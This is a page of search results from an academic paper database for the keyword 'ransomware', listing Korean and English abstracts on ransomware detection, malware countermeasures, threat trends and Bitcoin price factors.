• Title/Summary/Keyword: Ransomware

Search Result 88, Processing Time 0.033 seconds

Design of Intelligent Intrusion Context-aware Inference System for Active Detection and Response (능동적 탐지 대응을 위한 지능적 침입 상황 인식 추론 시스템 설계)

  • Hwang, Yoon-Cheol;Mun, Hyung-Jin
    • Journal of Convergence for Information Technology
    • /
    • v.12 no.4
    • /
    • pp.126-132
    • /
    • 2022
  • At present, due to the rapid spread of smartphones and activation of IoT, malicious codes are disseminated using SNS, or intelligent intrusions such as intelligent APT and ransomware are in progress. The damage caused by the intelligent intrusion is also becoming more consequential, threatening, and emergent than the previous intrusion. Therefore, in this paper, we propose an intelligent intrusion situation-aware reasoning system to detect transgression behavior made by such intelligent malicious code. The proposed system was used to detect and respond to various intelligent intrusions at an early stage. The anticipated system is composed of an event monitor, event manager, situation manager, response manager, and database, and through close interaction between each component, it identifies the previously recognized intrusive behavior and learns about the new invasive activities. It was detected through the function to improve the performance of the inference device. In addition, it was found that the proposed system detects and responds to intelligent intrusions through the state of detecting ransomware, which is an intelligent intrusion type.

A Countermeasure against a Whitelist-based Access Control Bypass Attack Using Dynamic DLL Injection Scheme (동적 DLL 삽입 기술을 이용한 화이트리스트 기반 접근통제 우회공격 대응 방안 연구)

  • Kim, Dae-Youb
    • Journal of IKEEE
    • /
    • v.26 no.3
    • /
    • pp.380-388
    • /
    • 2022
  • The traditional malware detection technologies collect known malicious programs and analyze their characteristics. Then such a detection technology makes a blacklist based on the analyzed malicious characteristics and checks programs in the user's system based on the blacklist to determine whether each program is malware. However, such an approach can detect known malicious programs, but responding to unknown or variant malware is challenging. In addition, since such detection technologies generally monitor all programs in the system in real-time, there is a disadvantage that they can degrade the system performance. In order to solve such problems, various methods have been proposed to analyze major behaviors of malicious programs and to respond to them. The main characteristic of ransomware is to access and encrypt the user's file. So, a new approach is to produce the whitelist of programs installed in the user's system and allow the only programs listed on the whitelist to access the user's files. However, although it applies such an approach, attackers can still perform malicious behavior by performing a DLL(Dynamic-Link Library) injection attack on a regular program registered on the whitelist. This paper proposes a method to respond effectively to attacks using DLL injection.

Deobfuscation Processing and Deep Learning-Based Detection Method for PowerShell-Based Malware (파워쉘 기반 악성코드에 대한 역난독화 처리와 딥러닝 기반 탐지 방법)

  • Jung, Ho-jin;Ryu, Hyo-gon;Jo, Kyu-whan;Lee, Sangkyun
    • Journal of the Korea Institute of Information Security & Cryptology
    • /
    • v.32 no.3
    • /
    • pp.501-511
    • /
    • 2022
  • In 2021, ransomware attacks became popular, and the number is rapidly increasing every year. Since PowerShell is used as the primary ransomware technique, the need for PowerShell-based malware detection is ever increasing. However, the existing detection techniques have limits in that they cannot detect obfuscated scripts or require a long processing time for deobfuscation. This paper proposes a simple and fast deobfuscation method and a deep learning-based classification model that can detect PowerShell-based malware. Our technique is composed of Word2Vec and a convolutional neural network to learn the meaning of a script extracting important features. We tested the proposed model using 1400 malicious codes and 8600 normal scripts provided by the AI-based PowerShell malicious script detection track of the 2021 Cybersecurity AI/Big Data Utilization Contest. Our method achieved 5.04 times faster deobfuscation than the existing methods with a perfect success rate and high detection performance with FPR of 0.01 and TPR of 0.965.

Empirical Analysis on Bitcoin Price Change by Consumer, Industry and Macro-Economy Variables (비트코인 가격 변화에 관한 실증분석: 소비자, 산업, 그리고 거시변수를 중심으로)

  • Lee, Junsik;Kim, Keon-Woo;Park, Do-Hyung
    • Journal of Intelligence and Information Systems
    • /
    • v.24 no.2
    • /
    • pp.195-220
    • /
    • 2018
  • In this study, we conducted an empirical analysis of the factors that affect the change of Bitcoin Closing Price. Previous studies have focused on the security of the block chain system, the economic ripple effects caused by the cryptocurrency, legal implications and the acceptance to consumer about cryptocurrency. In various area, cryptocurrency was studied and many researcher and people including government, regardless of country, try to utilize cryptocurrency and applicate to its technology. Despite of rapid and dramatic change of cryptocurrencies' price and growth of its effects, empirical study of the factors affecting the price change of cryptocurrency was lack. There were only a few limited studies, business reports and short working paper. Therefore, it is necessary to determine what factors effect on the change of closing Bitcoin price. For analysis, hypotheses were constructed from three dimensions of consumer, industry, and macroeconomics for analysis, and time series data were collected for variables of each dimension. Consumer variables consist of search traffic of Bitcoin, search traffic of bitcoin ban, search traffic of ransomware and search traffic of war. Industry variables were composed GPU vendors' stock price and memory vendors' stock price. Macro-economy variables were contemplated such as U.S. dollar index futures, FOMC policy interest rates, WTI crude oil price. Using above variables, we did times series regression analysis to find relationship between those variables and change of Bitcoin Closing Price. Before the regression analysis to confirm the relationship between change of Bitcoin Closing Price and the other variables, we performed the Unit-root test to verifying the stationary of time series data to avoid spurious regression. Then, using a stationary data, we did the regression analysis. As a result of the analysis, we found that the change of Bitcoin Closing Price has negative effects with search traffic of 'Bitcoin Ban' and US dollar index futures, while change of GPU vendors' stock price and change of WTI crude oil price showed positive effects. In case of 'Bitcoin Ban', it is directly determining the maintenance or abolition of Bitcoin trade, that's why consumer reacted sensitively and effected on change of Bitcoin Closing Price. GPU is raw material of Bitcoin mining. Generally, increasing of companies' stock price means the growth of the sales of those companies' products and services. GPU's demands increases are indirectly reflected to the GPU vendors' stock price. Making an interpretation, a rise in prices of GPU has put a crimp on the mining of Bitcoin. Consequently, GPU vendors' stock price effects on change of Bitcoin Closing Price. And we confirmed U.S. dollar index futures moved in the opposite direction with change of Bitcoin Closing Price. It moved like Gold. Gold was considered as a safe asset to consumers and it means consumer think that Bitcoin is a safe asset. On the other hand, WTI oil price went Bitcoin Closing Price's way. It implies that Bitcoin are regarded to investment asset like raw materials market's product. The variables that were not significant in the analysis were search traffic of bitcoin, search traffic of ransomware, search traffic of war, memory vendor's stock price, FOMC policy interest rates. In search traffic of bitcoin, we judged that interest in Bitcoin did not lead to purchase of Bitcoin. It means search traffic of Bitcoin didn't reflect all of Bitcoin's demand. So, it implies there are some factors that regulate and mediate the Bitcoin purchase. In search traffic of ransomware, it is hard to say concern of ransomware determined the whole Bitcoin demand. Because only a few people damaged by ransomware and the percentage of hackers requiring Bitcoins was low. Also, its information security problem is events not continuous issues. Search traffic of war was not significant. Like stock market, generally it has negative in relation to war, but exceptional case like Gulf war, it moves stakeholders' profits and environment. We think that this is the same case. In memory vendor stock price, this is because memory vendors' flagship products were not VRAM which is essential for Bitcoin supply. In FOMC policy interest rates, when the interest rate is low, the surplus capital is invested in securities such as stocks. But Bitcoin' price fluctuation was large so it is not recognized as an attractive commodity to the consumers. In addition, unlike the stock market, Bitcoin doesn't have any safety policy such as Circuit breakers and Sidecar. Through this study, we verified what factors effect on change of Bitcoin Closing Price, and interpreted why such change happened. In addition, establishing the characteristics of Bitcoin as a safe asset and investment asset, we provide a guide how consumer, financial institution and government organization approach to the cryptocurrency. Moreover, corroborating the factors affecting change of Bitcoin Closing Price, researcher will get some clue and qualification which factors have to be considered in hereafter cryptocurrency study.

2019 국내·외 주요 및 신규 랜섬웨어 동향 분석

  • Park, Eunhu;Kim, Soram;Lee, Sehun;Kim, Jongsung
    • Review of KIISC
    • /
    • v.29 no.6
    • /
    • pp.39-48
    • /
    • 2019
  • 랜섬웨어(Ransomware)는 몸값(Ransom)과 소프트웨어(Software)의 합성어로 사용자 시스템을 장악하여 중요 문서 및 파일을 암호화하고 암호화된 파일의 복호화를 대가로 가상 화폐를 요구한다. 랜섬웨어로 인한 피해는 매년 증가하고 있으며 새로운 랜섬웨어의 등장과 변종의 출현이 빈번하다. 이에 본 논문은 2019년에 등장하거나 영향을 주고 있는 랜섬웨어에 대한 유포방법, 유포 대상, 알고리즘 사용 현황을 밝히고 국내 외 피해 사례를 소개한다. 그리고 분기 별로 감염율 상위 5개의 랜섬웨어를 살펴보고 평균 요구 금액에 대해 기술한다. 마지막으로 주요 및 신규 랜섬웨어 대해 유포 경로, 특징, 암호화 알고리즘, 복호화 요소 및 복호화 도구에 대해서는 표로 요약하며 자세히 서술한다.

Operating principle and preventive measures of Ransomware (랜섬웨어의 동작 원리와 예방 대책)

  • Cho, Young-Ju;Kim, Jin-Hyuk;Oh, Ji-Hoon;So, Youn-Jeong;Sun, A-Young
    • Proceedings of the Korea Contents Association Conference
    • /
    • 2017.05a
    • /
    • pp.91-92
    • /
    • 2017
  • 발전하는 IoT시대에 컴퓨터의 사용은 현대인들과 밀접한 관계가 되어 있다. 이로 인해, 우리는 다양한 문서들을 직접 종이에 일일이 적는 불편함을 컴퓨터를 통해 편하게 문서화를 할 수 있게 되었다. 그러나 모든 문서가 컴퓨터에 저장이 되어 있다 보니 이를 악용한 바이러스가 바로 랜섬웨어이다. 본 논문에서는 랜섬웨어의 의미와 동작원리에 대해 알아보고, 예방 대책을 제안하고자 한다.

  • PDF

A Network Transport System Using Next Generation CCN Technology

  • Lee, Hyung-Su;Park, Jae-Pyo;Park, Jae-Kyung
    • Journal of the Korea Society of Computer and Information
    • /
    • v.22 no.10
    • /
    • pp.93-100
    • /
    • 2017
  • Current internet has evolved from the sharing and efficiency aspects of information, it is still vulnerable to the fact that the Internet is not secure in terms of security and is not safe to secure of security mechanism. Repeating patches on continuous hacking are continuously demanding additional resources for network or system equipment, and consequently the costs continue to increase. Businesses and individuals alike are speeding up the damage caused by crime like of ransomware, not jusy simple attacks, and businesses and individuals need to respond to cyber security. In addition, the ongoing introduce of security device, and separate of networks for secure transmission of contents in the existing TCP/IP system, but it is still lacking in security. To complement the security implications of this existing TCP/IP Internet Protocol, we intend to propose a Secure Contents Transport System (SCTS) on the network using the CCN concept.

Design of a Real-time Risk Analysis System for Ransomware Using Mining based on Social Network Service (소셜 네트워크 서비스 기반 마이닝을 이용한 실시간 랜섬웨어 위험도 분석 시스템 설계)

  • Na, Jaeho;Kim, Mihui
    • Proceedings of the Korea Information Processing Society Conference
    • /
    • 2017.11a
    • /
    • pp.254-256
    • /
    • 2017
  • 본 논문에서는 소셜 네트워크 서비스 중 트위터를 마이닝하여 실시간으로 랜섬웨어 위험도 분석을 하는 시스템을 설계한다. 이를 위해 2017년 5월 12일에 가장 피해가 컸던 워너크라이 랜섬웨어를 중심으로 5월 10일에서 20일 사이의 트윗 데이터를 마이닝하고, 기존 시스템인 구글 트렌드와의 유사성을 비교 실험하여 트윗 데이터의 가치를 확인한다. 마지막으로 제안하는 시스템에 대한 향후 연구주제를 제시한다.

Analysis and Countermeasures for the Ransomware Cryptolocker (랜섬웨어 Cryptolocker에 대한 분석과 대응방안)

  • Kim, yongki;Ham, donggyun;Joo, younghwan;Lee, Keun-Ho
    • Proceedings of the Korea Information Processing Society Conference
    • /
    • 2016.04a
    • /
    • pp.292-293
    • /
    • 2016
  • 랜섬웨어는 현재 보안 문제 중 가장 뜨거운 이슈로 떠오르고 있다. 러시아에서 처음으로 등장한 랜섬웨어 공격은 거의 4,000가지 유형을 가지고 있으며, 전 세계 3억7천만 원의 피해를 가져왔다. 또한, 기존의 공격보다 더 발달 된 기술은 계속해서 등장하고 있다. 본 논문에서는 랜섬웨어의 Cryptolocker 공격 방법을 분석했다. 전체 시나리오에 대한 이해와 분석은 대책을 위한 새로운 계획을 위해 제안하고자 한다.

Research on the identification and blocking of known executalbe files at the network packet level (네트워크 패킷 레벨에서 알려진 실행 파일 식별 및 차단 연구)

  • Jo, Yongsoo;Lee, heejo
    • Proceedings of the Korea Information Processing Society Conference
    • /
    • 2020.05a
    • /
    • pp.177-179
    • /
    • 2020
  • 최근의 사이버 침해 사고는 공격 대상을 지정하여 지속적으로 공격을 시도하는 APT(Advanced Persistent Threat)와 랜섬웨어(Ransomware) 공격이 주를 이룬다. APT 공격은 dirve by download 를 통하여 의도하지 않은 파일의 다운로드를 유도하고, 다운로드 된 파일은 역통신채널을 만들어 내부 데이터를 외부로 유출하는 방식으로 공격에 사용되는 악성 파일이 사용자 모르게 다운로드 되어 실행된다. 랜섬웨어는 스피어 피싱 (Spear-phishing) 과 같은 사회공학기법을 이용하여 신뢰 된 출처로 유장 된 파일을 실행하도록 하여 주요 파일들을 암호화 한다. 때문에 사용자와 공격자 사이 네트워크 중간에 위치한 패킷 기반의 보안 장비들은 사용자에 의해 다운로드 되는 파일들을 선제적으로 식별하고, 차단하여 침해 확산을 방지 할 수 있는 방안이 필요하다. 본 논문에서는 네트워크 패킷 레벨에서 알려진 악성파일을 식별하고 실시간 차단하는 방안에 대하여 연구하고자 한다.